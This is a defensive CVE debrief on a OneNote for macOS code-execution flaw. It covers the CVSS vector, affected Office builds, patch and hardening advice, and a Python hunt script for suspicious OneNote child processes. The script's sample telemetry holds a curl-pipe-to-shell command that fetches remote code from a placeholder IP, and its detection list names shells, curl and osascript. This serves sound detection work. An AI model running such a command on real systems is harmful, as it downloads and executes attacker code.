PatchSiren cyber security CVE debrief
CVE-2025-21402 Microsoft CVE debrief
A remote code execution vulnerability in Microsoft OneNote for macOS, published by Microsoft on January 14, 2025, and last modified on May 19, 2026. An attacker who convinces a user to open a malicious OneNote document can execute arbitrary code on the user's system with that user's privileges. Microsoft has released updates that fix the issue. The CVSS 3.1 base score of 7.8 (HIGH) reflects a local attack vector, low attack complexity, no privileges required, and required user interaction; "remote" in Microsoft's title describes the attacker, who delivers the file over email or a share, while the vector is rated local because the code runs only when the victim opens the file on their own machine. Affected products are Microsoft Office 2024 LTSC for Mac, Office LTSC 2021 for Mac, and OneNote for Mac. Microsoft's advisory classifies the weakness as CWE-641 (Improper Restriction of Names for Files and Other Resources); NVD lists it as NVD-CWE-noinfo, and the stored evidence does not describe the mechanism beyond that classification.
- Vendor
- Microsoft
- Product
- Microsoft Office LTSC for Mac 2021 (also affected: Microsoft Office 2024 LTSC for Mac, OneNote for Mac)
- CVSS
- HIGH 7.8
- CISA KEV
- Not listed in stored evidence
- Original CVE published
- 2025-01-14
- Original CVE updated
- 2026-05-19
- Advisory published
- 2025-01-14
- Advisory updated
- 2026-05-19
Who should care
Organizations running Microsoft Office 2024 LTSC, Office LTSC 2021, or OneNote on macOS; security teams responsible for macOS endpoint protection and telemetry; and anyone who receives OneNote documents from outside their organization, since the attack depends on a user opening an attacker-supplied file.
Technical summary
This vulnerability in Microsoft OneNote for macOS permits code execution when a user opens a specially crafted OneNote document. The CVSS vector rates the attack vector as local (AV:L) because the malicious file must be opened on the victim's machine, but the attacker needs no prior access or privileges (PR:N); delivery is typically by email attachment, download, or shared notebook, and the only hurdle is persuading the user to open the file (UI:R). Successful exploitation runs attacker code in the user's session with high impact to confidentiality, integrity, and availability (C:H/I:H/A:H), with scope unchanged (S:U). Microsoft's advisory attributes the flaw to improper restriction of file or resource names (CWE-641); no further detail on the mechanism is available in the stored evidence.
Defensive priority
HIGH
Recommended defensive actions
- Apply the Microsoft security updates for Office 2024 LTSC for Mac, Office LTSC 2021 for Mac, and OneNote for Mac referenced in the Microsoft Security Response Center advisory; confirm the installed OneNote build on each endpoint rather than relying on Microsoft AutoUpdate having run
- Educate users not to open OneNote files (.one, .onepkg) from untrusted sources, and treat unexpected OneNote attachments as you would macro-enabled Office documents
- Office documents are not executables, so application control cannot block the document itself; use it instead to restrict what OneNote is allowed to launch, and keep Gatekeeper and file quarantine enabled so downloaded payloads are not silently executable
- Monitor macOS process telemetry (EDR or Endpoint Security framework events) for OneNote spawning shells, scripting interpreters, curl, osascript, or binaries from user-writable paths; a document viewer has no legitimate reason to do so
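The last two actions above describe a detection rather than a patch, so here is that detection worked through on sample telemetry. This is an added example written for this debrief; it is not code from PatchSiren, Microsoft, or any EDR vendor. It assumes a sensor that exports macOS process-start events as JSON lines with the field names used below (ts, pid, user, parent_name, image, cmdline); those field names, the benign-path allowlist, and the sample events are all constructed for illustration and would be adapted to a real sensor's schema.

```python
"""Hunt for suspicious child processes of OneNote for Mac in process-start telemetry.

Added example, not part of the original advisory. Field names, path prefixes and
the sample events are constructed assumptions, not any vendor's real schema.
"""
import json
from pathlib import PurePosixPath
from typing import Dict, List, Optional

# Interpreters and network/staging tools a document viewer has no reason to launch.
SUSPICIOUS_BINARIES = {
    "sh", "bash", "zsh", "osascript", "python3", "perl", "ruby",
    "curl", "nscurl", "open", "xattr", "chmod", "launchctl",
}
# Parent process names that identify OneNote for Mac in this (assumed) schema.
ONENOTE_PARENTS = {"Microsoft OneNote", "OneNote"}
# Locations of the app's own helpers; children started from here are expected.
BENIGN_PREFIXES = (
    "/Applications/Microsoft OneNote.app/",
    "/Library/Application Support/Microsoft/",
    "/System/Library/Frameworks/",
)
# User-writable locations: a binary executed from here right after a document opens
# is the classic dropper pattern and is flagged regardless of its name.
USER_WRITABLE_PREFIXES = ("/tmp/", "/private/tmp/", "/Users/Shared/", "/var/folders/")


def classify(event: Dict) -> Optional[str]:
    """Return a reason string if the process-start event is suspicious, else None."""
    if event.get("parent_name") not in ONENOTE_PARENTS:
        return None
    image = event.get("image", "")
    if image.startswith(BENIGN_PREFIXES):
        return None
    name = PurePosixPath(image).name
    if name in SUSPICIOUS_BINARIES:
        return f"OneNote spawned interpreter/LOLBin {name}"
    home = f"/Users/{event.get('user', '')}/"
    if image.startswith(USER_WRITABLE_PREFIXES) or image.startswith(home):
        return f"OneNote spawned binary from user-writable path {image}"
    return None


def hunt(jsonl: str) -> List[Dict]:
    """Run classify() over JSON-lines events, skipping blank or malformed lines."""
    hits = []
    for line in jsonl.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # malformed telemetry line; do not let it abort the hunt
        reason = classify(event)
        if reason:
            hits.append({"ts": event.get("ts"), "pid": event.get("pid"),
                         "image": event.get("image"), "cmdline": event.get("cmdline"),
                         "reason": reason})
    return hits


# Constructed sample events (not real telemetry). Two are benign OneNote helpers,
# two are the patterns we want to catch, one is a shell under Finder (ignored),
# and one is deliberately malformed.
SAMPLE_EVENTS = """\
{"ts":"2025-01-15T09:12:01Z","pid":4101,"user":"alice","parent_name":"Microsoft OneNote","image":"/Applications/Microsoft OneNote.app/Contents/MacOS/Microsoft OneNote","cmdline":"Microsoft OneNote"}
{"ts":"2025-01-15T09:12:03Z","pid":4102,"user":"alice","parent_name":"Microsoft OneNote","image":"/System/Library/Frameworks/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent","cmdline":"com.apple.WebKit.WebContent"}
{"ts":"2025-01-15T09:12:05Z","pid":4103,"user":"alice","parent_name":"Microsoft OneNote","image":"/bin/zsh","cmdline":"/bin/zsh -c curl -s http://198.51.100.7/s | sh"}
{"ts":"2025-01-15T09:12:06Z","pid":4104,"user":"alice","parent_name":"Microsoft OneNote","image":"/private/tmp/.helper","cmdline":"/private/tmp/.helper --install"}
{"ts":"2025-01-15T09:12:07Z","pid":4105,"user":"alice","parent_name":"Finder","image":"/bin/zsh","cmdline":"/bin/zsh"}
not json
"""

if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(hit["ts"], hit["pid"], hit["reason"], "|", hit["cmdline"])
```

On the sample data the hunt returns exactly the zsh and /private/tmp events. The allowlist deliberately keys on the parent's own bundle and Microsoft's shared support directory rather than on child process names, because the attacker controls the name of whatever is dropped but not where OneNote's legitimate helpers live.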
Evidence notes
CVE published 2025-01-14; last modified 2026-05-19. CVSS 3.1 vector: AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H, which the base-score formula resolves to 7.8 (HIGH). The affected CPEs confirm that only the macOS builds of Office and OneNote are in scope. NVD tags the Microsoft reference as 'Patch, Vendor Advisory'.
Official resources
- CVE-2025-21402 CVE record (CVE.org)
- CVE-2025-21402 NVD detail (NVD)
- Source item URL: nvd_modified
- Mitigation or vendor reference: [email protected] - Patch, Vendor Advisory
Microsoft disclosed this vulnerability on January 14, 2025, with updates available the same day. The CVE record was subsequently modified on May 19, 2026. The stored evidence does not show the CVE in the CISA Known Exploited Vulnerabilities catalog, so no confirmed in-the-wild exploitation or ransomware use is recorded there; absence from KEV is not proof that the flaw has never been exploited, and the patch should be applied on the HIGH priority above regardless.